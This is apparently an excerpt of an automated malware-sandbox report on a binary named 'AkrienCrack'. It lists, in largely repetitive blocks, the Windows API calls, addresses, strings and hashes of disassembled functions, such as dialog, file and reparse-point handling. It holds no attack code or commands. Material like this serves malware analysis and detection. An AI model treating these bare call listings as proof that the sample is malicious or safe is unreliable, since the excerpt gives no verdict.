              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DAB2
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DAB2
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DBD5
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DBD5
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DBD5
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DBD5
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DAB2
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DC36
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DC36
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DC36
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5D8A3
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DAB2
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DBD5
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B5DC36
                • Part of subcall function 00B5DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B5DFD6
                • Part of subcall function 00B5DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B5DFE7
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              APIs
              • SetCurrentDirectoryW.KERNELBASE(?,00B5A587,C:\Users\user\AppData\Local\Temp,00000000,00B8946A,00000006), ref: 00B5A326
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: CurrentDirectory
              • String ID:
              • API String ID: 1611563598-0
              • Opcode ID: bf89860fd668830d8b990c50ba500508988b6c4eaa3ae0885526430c5d96c87f
              • Instruction ID: 7f9abd5c24bc3a54aee7a024331a1e1557bbb135245d3f071ceaf03a5a05e61b
              • Opcode Fuzzy Hash: bf89860fd668830d8b990c50ba500508988b6c4eaa3ae0885526430c5d96c87f
              • Instruction Fuzzy Hash: A2A01230194006568A000B30CC09C1577905760B02F0086207006C14A0CF308854B500
              APIs
                • Part of subcall function 00B4130B: GetDlgItem.USER32(00000000,00003021), ref: 00B4134F
                • Part of subcall function 00B4130B: SetWindowTextW.USER32(00000000,00B735B4), ref: 00B41365
              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00B5B971
              • EndDialog.USER32(?,00000006), ref: 00B5B984
              • GetDlgItem.USER32(?,0000006C), ref: 00B5B9A0
              • SetFocus.USER32(00000000), ref: 00B5B9A7
              • SetDlgItemTextW.USER32(?,00000065,?), ref: 00B5B9E1
              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00B5BA18
              • FindFirstFileW.KERNEL32(?,?), ref: 00B5BA2E
              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B5BA4C
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B5BA5C
              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00B5BA78
              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00B5BA94
              • _swprintf.LIBCMT ref: 00B5BAC4
                • Part of subcall function 00B4400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B4401D
              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00B5BAD7
              • FindClose.KERNEL32(00000000), ref: 00B5BADE
              • _swprintf.LIBCMT ref: 00B5BB37
              • SetDlgItemTextW.USER32(?,00000068,?), ref: 00B5BB4A
              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00B5BB67
              • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00B5BB87
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00B5BB97
              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00B5BBB1
              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00B5BBC9
              • _swprintf.LIBCMT ref: 00B5BBF5
              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00B5BC08
              • _swprintf.LIBCMT ref: 00B5BC5C
              • SetDlgItemTextW.USER32(?,00000069,?), ref: 00B5BC6F
                • Part of subcall function 00B5A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00B5A662
                • Part of subcall function 00B5A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,00B7E600,?,?), ref: 00B5A6B1
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
              • String ID: %s %s$%s %s %s$REPLACEFILEDLG
              • API String ID: 797121971-1840816070
              • Opcode ID: e63714385a085d7ef4c9242b4c95bdce856974226b9179ec9637286b93462203
              • Instruction ID: 2daf9f5ed823bfad4ecb0d81c53527ab3f582ad2e0e2627e33b9a5c3a446239d
              • Opcode Fuzzy Hash: e63714385a085d7ef4c9242b4c95bdce856974226b9179ec9637286b93462203
              • Instruction Fuzzy Hash: C691B672244348BBD6319BA4DD89FFB77ECEB4A701F040899FB49D3091DB7196098762
              APIs
              • __EH_prolog.LIBCMT ref: 00B47191
              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 00B472F1
              • CloseHandle.KERNEL32(00000000), ref: 00B47301
                • Part of subcall function 00B47BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B47C04
                • Part of subcall function 00B47BF5: GetLastError.KERNEL32 ref: 00B47C4A
                • Part of subcall function 00B47BF5: CloseHandle.KERNEL32(?), ref: 00B47C59
              • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00B4730C
              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00B4741A
              • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00B47446
              • CloseHandle.KERNEL32(?), ref: 00B47457
              • GetLastError.KERNEL32 ref: 00B47467
              • RemoveDirectoryW.KERNEL32(?), ref: 00B474B3
              • DeleteFileW.KERNEL32(?), ref: 00B474DB
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
              • API String ID: 3935142422-3508440684
              • Opcode ID: 3597c25d03291517b1fff20883178d2c53ffe6920a8ab9b6828c9a69c10ed0b5
              • Instruction ID: 4e1aef8e836efe0c27c2b60bd1fb4620d95d881c4fd9a460ec2ec5d9f45dfd4c
              • Opcode Fuzzy Hash: 3597c25d03291517b1fff20883178d2c53ffe6920a8ab9b6828c9a69c10ed0b5
              • Instruction Fuzzy Hash: 2FB1CD71904215AADB21DFA4CC85BEE77F8EF04700F0045E9F949E7242DB34AB89DBA1
              APIs
              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00B5A662
              • GetNumberFormatW.KERNEL32(00000400,00000000,?,00B7E600,?,?), ref: 00B5A6B1
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: FormatInfoLocaleNumber
              • String ID:
              • API String ID: 2169056816-0
              • Opcode ID: 55fcf7f94856544216895500f021a0a2c7bf7f8e010f5868eb1ed2ead3f2b2c6
              • Instruction ID: d46f9ff9d0df9270e9a2515a58cf0bfcdfa179bf4ba9ce58dcd4233e91076591
              • Opcode Fuzzy Hash: 55fcf7f94856544216895500f021a0a2c7bf7f8e010f5868eb1ed2ead3f2b2c6
              • Instruction Fuzzy Hash: 16015A36500209BADB10DFA4EC05FABB7FCEF19710F5144A2BA18A7160DB70DA648BA5
              APIs
              • GetVersionExW.KERNEL32(?), ref: 00B4AD1A
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmp
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: Version
              • String ID:
              • API String ID: 1889659487-0
              • Opcode ID: f28d6cda3fc18770bf7be457325124dc6ad5c5972c0b3b71fd7ea363c3ecc1cc
              • Instruction ID: ae425ab9af8001cc361ecbc9addffa0c0980b064c4c4e43c253efa4d4b3b0108
              • Opcode Fuzzy Hash: f28d6cda3fc18770bf7be457325124dc6ad5c5972c0b3b71fd7ea363c3ecc1cc
              • Instruction Fuzzy Hash: 72F0F9B1D002188BC728DB18EC826E973E5FB58715F2042E5DA2943764DB70AA84DF51
              APIs
              • _swprintf.LIBCMT ref: 00B4DABE
                • Part of subcall function 00B4400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B4401D
                • Part of subcall function 00B51596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00B80EE8,00000200,00B4D202,00000000,?,00000050,00B80EE8), ref: 00B515B3
              • _strlen.LIBCMT ref: 00B4DADF
              • SetDlgItemTextW.USER32(?,00B7E154,?), ref: 00B4DB3F
              • GetWindowRect.USER32(?,?), ref: 00B4DB79
